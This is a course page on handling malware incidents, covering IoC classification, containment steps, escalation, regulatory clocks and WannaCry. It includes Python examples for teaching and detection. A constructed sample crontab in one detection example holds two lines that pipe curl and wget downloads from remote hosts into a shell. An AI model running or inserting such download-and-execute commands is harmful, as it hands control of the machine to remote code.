Incident Management — Week 03, Class 1

Handling Malware Incidents

This interactive playbook translates foundational incident response principles into an actionable dashboard. Explore malware classifications, indicator frameworks, strict containment protocols, and historical case analyses to build your active defense capabilities.

⚠️ The Golden Rule

CONTAIN — DO NOT POWER OFF

  • Powering off destroys RAM and forensic timelines.
  • Modern malware may react destructively to shutdown.
  • Rebooting re-engages persistence mechanisms.

1. Threat Intelligence & Classification

Understanding the adversary is the first step in the NIST framework (Detection & Analysis). This section allows you to interactively explore the six core malware families to understand their primary behaviors, and dissect the "Pyramid of Pain" to learn which Indicators of Compromise (IoCs) are most valuable to defend against.

Malware Family Profiler

Virus

Needs a host file; requires user interaction to run. Primary goal is to replicate.

Rule: Classify by primary behaviour right now. Real malware blurs the lines.

The Pyramid of Pain

Each level names an IoC category. Higher levels cause more pain for attackers to change.

TTPs (Tough!)
Tools (Challenging)
Network / Host Artefacts (Annoying)
Domain Names (Simple)
IP Addresses (Easy)
Hash Values (Trivial)

TTPs (Tactics, Techniques, Procedures)

The highest value IoC. This represents the attacker's fundamental behavior. Forcing them to change TTPs requires them to learn new skills and build new infrastructure.

Example: MITRE ATT&CK techniques, cron job piping to bash.
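As an added example (not part of the original lesson), the snippet below turns the two ideas above into detection logic: it classifies atomic indicators into their Pyramid of Pain level so a defender can see which blocks are cheap for the attacker to evade, and it hunts for the "cron job piping to bash" TTP across a constructed crontab. The crontab entries, the IP 203.0.113.10 and the domain cdn.example.net are made-up sample data; the regexes are this example's own, not a MITRE ATT&CK artefact.

```python
import re

# Pyramid of Pain levels as listed on the page, lowest pain first.
PAIN_LEVELS = ["hash", "ip", "domain", "artefact", "tool", "ttp"]

HEX_HASH = re.compile(r"^(?:[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64})$", re.I)
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
DOMAIN = re.compile(r"^(?=.{1,253}$)(?:[a-z0-9-]{1,63}\.)+[a-z]{2,}$", re.I)


def classify_indicator(value: str) -> str:
    """Map one atomic indicator string to its pyramid level.

    MD5/SHA-1/SHA-256 hashes, IPv4 addresses and domain names are recognised
    syntactically; anything else (mutex names, registry paths, URI fragments)
    is treated as a host/network artefact.
    """
    v = value.strip()
    if HEX_HASH.match(v):
        return "hash"
    if IPV4.match(v) and all(0 <= int(octet) <= 255 for octet in v.split(".")):
        return "ip"
    if DOMAIN.match(v):
        return "domain"
    return "artefact"


def rank_by_pain(values):
    """Return (level, value) pairs, most durable (highest pain) first."""
    pairs = [(classify_indicator(v), v) for v in values]
    return sorted(pairs, key=lambda p: PAIN_LEVELS.index(p[0]), reverse=True)


# Download-and-execute pipeline: curl/wget output piped straight into a shell.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(?:ba|z|da)?sh\b")

# Constructed sample crontab (not from any real incident).
SAMPLE_CRONTAB = """\
0 2 * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
*/5 * * * * curl -s http://203.0.113.10/u.sh | bash
@reboot wget -qO- https://cdn.example.net/init | sh
30 4 * * 0 /usr/bin/find /tmp -type f -mtime +7 -delete
"""


def find_pipe_to_shell(crontab_text: str):
    """Flag crontab entries exhibiting the pipe-to-shell TTP.

    Returns (line_number, downloader, line) tuples. Comments and blank
    lines are skipped; matching is on behaviour, not on any specific
    URL, so changing the host or path does not evade it.
    """
    hits = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = PIPE_TO_SHELL.search(line)
        if m:
            hits.append((lineno, m.group(1), line))
    return hits


if __name__ == "__main__":
    for level, value in rank_by_pain(["203.0.113.10", "cdn.example.net",
                                      "d41d8cd98f00b204e9800998ecf8427e"]):
        print(f"{level:8s} {value}")
    for lineno, tool, line in find_pipe_to_shell(SAMPLE_CRONTAB):
        print(f"line {lineno}: {tool} piped to shell -> {line}")
```

The point of `rank_by_pain` is that a block on the hash or IP costs the attacker nothing to route around, whereas `find_pipe_to_shell` keys on the behaviour itself and survives infrastructure changes.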

2. Containment Strategy Matrix

Effective containment operates across three distinct time horizons executed in parallel. This section breaks down the tactical menu for limiting the blast radius of an incident without destroying volatile evidence needed for analysis.

Short-term (Minutes)

  • Disable network adapter (NIC down, host up)
  • Block C2 IPs/domains at perimeter
  • Disable suspect user account
  • Quarantine via EDR

System Backup (Parallel)

  • Memory dump (DumpIt, WinPMEM, AVML)
  • Disk image (FTK Imager, dd)
  • Snapshot relevant logs
  • Capture volatile data before long-term actions.

Long-term (Hours-Days)

  • Emergency enterprise patches
  • Tighten enterprise firewall rules
  • Reset credentials at scale
  • Deploy IoC detections enterprise-wide
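The matrix above is a set of ordering rules as much as a menu: the golden rule forbids powering off, and volatile capture must finish before any long-term action. The following added example (mine, not from the course material) encodes those rules as a small runbook planner. It builds a dependency graph from hypothetical action entries mirroring the three columns, adds the implicit "backup before long-term" edges, rejects any action marked as violating the golden rule, and emits an execution order with a topological sort. Action names and the memory-before-disk ordering are assumptions of this example.

```python
from dataclasses import dataclass

# Horizons from the containment matrix; lower rank is scheduled first when
# several actions are ready at the same time.
HORIZON_RANK = {"short": 0, "backup": 1, "long": 2}


@dataclass(frozen=True)
class Action:
    name: str
    horizon: str              # "short", "backup" or "long"
    needs: tuple = ()         # explicit prerequisites (action names)
    forbidden: bool = False   # True for actions that break the golden rule


# Hypothetical runbook built from the matrix (constructed for this example).
RUNBOOK = [
    Action("nic_down", "short"),
    Action("block_c2", "short"),
    Action("disable_account", "short"),
    Action("edr_quarantine", "short"),
    Action("memory_dump", "backup"),
    Action("disk_image", "backup", needs=("memory_dump",)),  # order of volatility
    Action("snapshot_logs", "backup"),
    Action("emergency_patch", "long"),
    Action("reset_credentials", "long"),
    Action("deploy_ioc_detections", "long"),
]


def build_plan(actions):
    """Return action names in a safe execution order.

    Raises ValueError if an action violates the golden rule, references an
    unknown prerequisite, or the dependency graph is cyclic. Every long-term
    action is made to depend on every backup action, so volatile evidence is
    always captured first.
    """
    by_name = {a.name: a for a in actions}
    forbidden = [a.name for a in actions if a.forbidden]
    if forbidden:
        raise ValueError(f"golden rule violated by: {forbidden}")

    backups = {a.name for a in actions if a.horizon == "backup"}
    pending = {}
    for a in actions:
        needs = set(a.needs)
        if a.horizon == "long":
            needs |= backups
        unknown = needs - by_name.keys()
        if unknown:
            raise ValueError(f"{a.name} needs unknown action(s): {sorted(unknown)}")
        pending[a.name] = needs

    ordered = []
    while pending:
        ready = sorted((n for n, deps in pending.items() if not deps),
                       key=lambda n: (HORIZON_RANK[by_name[n].horizon], n))
        if not ready:
            raise ValueError(f"circular dependency among: {sorted(pending)}")
        current = ready[0]
        ordered.append(current)
        del pending[current]
        for deps in pending.values():
            deps.discard(current)
    return ordered


if __name__ == "__main__":
    for step, name in enumerate(build_plan(RUNBOOK), 1):
        print(f"{step:2d}. {name}")
```

Adding `Action("power_off", "short", forbidden=True)` to the runbook makes `build_plan` refuse to produce a plan at all, which is the behaviour you want from a runbook that someone edits under pressure.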

3. Communication & Escalation

Incident response fails when communication breaks down. This section outlines the structure (SBAR), the severity-driven cadence, and the strict regulatory clocks that begin ticking the moment you become aware of a potential breach.

The SBAR Framework

S — Situation: One sentence stating the problem.
B — Background: Two sentences of context.
A — Assessment: Two sentences of analysis/impact.
R — Recommendation: One sentence requesting action.

Channel Integrity

Ranked from highest integrity to "Assume Compromised".

1. Face-to-face
2. Personal mobile (voice call)
3. Encrypted OOB (Signal)
4. Personal email (emergency only)
5. Corporate VoIP
6. Corporate Slack/Teams
7. Corporate Email

The Regulatory Clock

Clock starts at awareness, not confirmation. Legal is your first call.

*HIPAA allows up to 60 days (1440 hours) for individual notification, but often requires faster internal action.
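To make "clock starts at awareness, not confirmation" concrete, here is an added example (not from the lesson) that computes the notification deadline from the awareness timestamp and reports how many hours remain. The 1440-hour HIPAA window is the figure stated above; the awareness and confirmation timestamps are constructed, and the 24-hour internal legal-notification target is an assumed organisational SLA used only to illustrate the "faster internal action" point.

```python
from datetime import datetime, timedelta, timezone

# Regulatory window stated on the page: 60 days = 1440 hours.
HIPAA_INDIVIDUAL_NOTIFICATION = timedelta(hours=1440)
# Assumed internal target for looping in Legal (organisational, not regulatory).
INTERNAL_LEGAL_NOTIFICATION = timedelta(hours=24)


def _require_aware(ts: datetime, label: str) -> None:
    """Naive timestamps silently shift deadlines across time zones; reject them."""
    if ts.tzinfo is None or ts.utcoffset() is None:
        raise ValueError(f"{label} must be timezone-aware")


def clock_status(awareness_at: datetime, now: datetime,
                 window: timedelta = HIPAA_INDIVIDUAL_NOTIFICATION) -> dict:
    """Deadline and remaining hours for a window that starts at awareness."""
    _require_aware(awareness_at, "awareness_at")
    _require_aware(now, "now")
    deadline = awareness_at + window
    remaining = (deadline - now) / timedelta(hours=1)
    return {
        "deadline": deadline,
        "hours_remaining": remaining,
        "overdue": remaining < 0,
    }


def hours_lost_to_confirmation(awareness_at: datetime, confirmed_at: datetime) -> float:
    """How much of the window would be overstated by starting the clock at
    confirmation instead of awareness."""
    _require_aware(awareness_at, "awareness_at")
    _require_aware(confirmed_at, "confirmed_at")
    return (confirmed_at - awareness_at) / timedelta(hours=1)


# Constructed scenario: SOC sees the first suspicious alert on 1 March;
# the breach is confirmed three days later.
AWARENESS = datetime(2024, 3, 1, 9, 0, tzinfo=timezone.utc)
CONFIRMED = datetime(2024, 3, 4, 9, 0, tzinfo=timezone.utc)

if __name__ == "__main__":
    status = clock_status(AWARENESS, now=CONFIRMED)
    print("individual notification due:", status["deadline"].isoformat())
    print("hours remaining at confirmation:", status["hours_remaining"])
    print("hours the clock would be overstated if started at confirmation:",
          hours_lost_to_confirmation(AWARENESS, CONFIRMED))
    legal = clock_status(AWARENESS, now=CONFIRMED, window=INTERNAL_LEGAL_NOTIFICATION)
    print("internal legal notification overdue:", legal["overdue"])
```

In the constructed scenario the internal 24-hour target has already lapsed by the time the breach is confirmed, which is exactly why Legal is the first call at awareness rather than after analysis finishes.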

4. Real-World Case Studies

History is the best teacher. This interactive dashboard analyzes four major global cyber incidents, mapping their attack vectors and outcomes directly to the NIST IR Lifecycle phases to extract actionable lessons.

WannaCry

Worm + Ransomware

Scale / Impact

200,000+ systems, 150 countries

Attack Vector

SMBv1 RCE via EternalBlue (MS17-010, patched 2 months earlier)

Resolution / Outcome

Stopped by kill-switch domain registered for $10.69.

NIST-Mapped Lessons

  • Preparation: Patch management cadence is not optional; disable SMBv1.
  • Containment: Segmentation limits blast radius.
  • Recovery: Offline backups beat ransom.